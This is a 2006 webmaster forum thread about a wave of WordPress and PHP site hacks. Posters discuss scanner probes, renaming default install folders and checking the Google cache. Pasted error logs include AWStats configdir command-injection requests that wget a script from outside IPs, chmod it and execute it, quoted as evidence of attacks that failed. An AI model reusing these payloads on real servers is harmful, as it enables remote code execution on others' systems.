Site hacked ~ Check your Google cache NOW!

For us it's been on various wp template files (So as a result, site wide), but in reality it could affect any sites that have php tags on the pages (I think ~ I just don't know until I figure out how they got access to the site)...

 

Check your access logs. Better even, your error logs.

It works like this. Prober knows that OS Software X has a hole in file osx/admin/index2.php

Prober writes a script that takes any domain, adds osx/admin/index2.php at the end of it and lets the script do nothing but GETs all day to all these random hosts. As soon as it gets a status 200 instead of 404, it's hooked and will try and hack you, knowing you have that file.

That's why it's bad practise IMO to install OS Software X (example) in its default folders like admin/. At the very least, rename admin to supersleuth/ and includes/ to /tobeincluded/ and 80% of the probes will fail.

A typical day's error log with entries looking for files I don;t have:

195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /phpmyadmin/read_dump.php HTTP/1.0" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /PMA/read_dump.php HTTP/1.0" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /mysql/read_dump.php HTTP/1.0" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /xampp/phpmyadmin/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /typo3/phpmyadmin/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /mysqladmin/read_dump.php HTTP/1.0" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /admin/read_dump.php HTTP/1.0" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /db/read_dump.php HTTP/1.0" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /dbadmin/read_dump.php HTTP/1.0" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /web/phpMyAdmin/read_dump.php HTTP/1.0" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /admin/pma/read_dump.php HTTP/1.0" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /admin/phpmyadmin/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpmyadmin2/read_dump.php HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpmyadmin1/read_dump.php HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpadmin/read_dump.php HTTP/1.0" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /myadmin/read_dump.php HTTP/1.0" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpMyAdmin-2.2.3/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.2.7-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.5.6/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.5.7-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.6.0/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.6.0-pl3/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.6.0-pl3/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin-2.6.1-pl3/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin-2.6.3-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin%202.6.4-pl4/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin%202.7.0-beta1/read_dump.php HTTP/1.0" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin%202.7.0-rc1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin%202.7.0/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin-2.6.4/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin%202.7.0-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin-2.2.7-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

Note Wordpress, Drupal and many other well known packages...:

69.64.38.143 e.co.uk - [21/Jan/2006:10:26:55 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:26:56 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:26:57 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:26:58 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:26:59 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:27:01 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:27:02 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:27:03 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:27:04 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:27:05 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:27:06 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.64.38.143 e.co.uk - [21/Jan/2006:10:27:07 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:17 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:18 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:20 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:24 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:25 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:26 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:28 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:29 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:30 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:31 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:33 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:37 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
61.114.201.234 e.co.uk - [21/Jan/2006:14:09:38 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:35 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:36 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:37 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:38 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:39 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:40 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:41 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:43 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:44 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:45 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:46 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:47 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
216.127.66.128 e.co.uk - [21/Jan/2006:14:22:48 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Code (markup):

Blocking their IPs is useless. It's a never ending story. As you can see they also check for unpassword-protected PHPMyAdmins and AWstats (for referer log spamming).

These are all 404's so they didn't find what they were looking for. See the folder structures they look for and how they match default installs? That's why you NEVER install Drupal in yourdomain/drupal/ or WordPress in yourdomain/wp/ /wordpress/ or /blog/ if you want to beat these assholes.

 

Thats Great TOPS, thanks for that I will spend some time checking this eveing!!

 

Damn, these guys are such fuckers...

It's like black hat gone too far.

 

This is not black hat it's criminal.

 

Yep...

I have no idea how to do anything about it at this stage though...

I can't see anything in the logs that spells out how they did it, and I BET they used virus infected machines to do it anyway, so it's a bit of a deadend for now.

 

Is Wordpress affected by this?

 

Read the thread.

YES!

 

You have a subset of the machines that they've hacked (via the G search) which gives you a list of domains they are back-linking to which gives you a list of the monitization services they are using all which should be tied to a bank account for payments.

I would hunt them down if it took decades.

 

Can your host restrict access by IP to only include you?

I'm sure they can also deny remote access like fopen etc. but being on a shared environment kind of sucks in that regard since whatever they change for you changes for everyone so it's unlikely.

 

Okay I have some questions.

I have a blog and have wordpress installed in the root folder. My admin folder is not admin but rather wp-admin.

Should I be worried?
Should I change that name?
If so is that going to affect my site in any way?

My cache is looking fine.

Skinny

 

WordPress sites (Which mine are) will be affected by this.

At the moment, it appears it's affecting sites that use commonly available/open source scripts ~ I don't know that they are being especially targetted, but they are certianly being affected.

I don't know how widespread this is, but I do know that google has nearly 400k pages showing an error. There are lots more out there that aren't erroring.

I don't know how they are targetting sites, so I don't know if you should be worried.

 

It might not necessarily be the admin files they entered via. I don't know the root file names of WP but it could be any of them.

osCommerce uses a filenames list so you can edit all of them really easily without having to dig through code in all files.

If you know you don't have high-end security and are slack on back-ups - it might be a good idea to rename everything.

It would be handy to know where they came in... Else it's like giving the entire ship a new hull just because there's a tiny little hole you can't find.

Oli, did you try WP forums?

 

T0PS...

I guess I could restrict access myself using the .htaccess file, right?

I was thinking of setting up a honey trap, but if they're using hacked machines to do it, that's not gonna be a lot of good.

I haven't tried the forums, but it doesn't like WP is being targetted specifically anyway, so should I be telling them, or the php dev guys, or what?

 

I was just rereading this whole thing. Okay

That is huge. Should we contact Google or do they already know. And yes someone needs to contact WP.

Skinny

 

It depends on whether they hack in via FTP or via PHP's file access functions. Chances are they can get to htaccess but you need to know their IP or your sites will be inaccessible for everybody.

It could also be as simple as CHMOD mistakes. But I'm no expert on how they can get in and abuse systems.

If your hosting space is compromised anyway, you might be able to find someone willing to poke around, someone who knows their shit.

 

Some more sites:

http://72.14.207.104/search?q=cache...ex.php+phpinclude.ru&hl=en&gl=uk&ct=clnk&cd=2
http://72.14.207.104/search?q=cache...ss.php+phpinclude.ru&hl=en&gl=uk&ct=clnk&cd=6
http://72.14.207.104/search?q=cache...llery+phpinclude.ru&hl=en&gl=uk&ct=clnk&cd=10

There are loads - with 380,000 broken cases (some are references though), there must be many more working ones and thats 1 address.

A thread about it, though Im not sure they are right as we reset the permissions a few days ago and cleared out the files and it came back.
http://www.pmachine.com/forums/viewthread/31111/

 

Most of those results (380000) actually come from a few sites. (lots of pages)

 

These are big boys... They're running their own DNS...

And like DA says, That thread doesn't make 100% sense...

I want to make it clear that we have had seperate sites, on seperate servers that are not interlinked (as far as I'm aware :|) all affected by this ~ that's a pretty big coinsidence...

The first assumption that this was a targetted attack, but the number of sites that are showing the error (Which means that there are more sites out there that aren't erroring) is huge, so it's not a personal attack...

Added

They're standard WordPress template build files.

They sit here

.com/wp-content/themes/themename/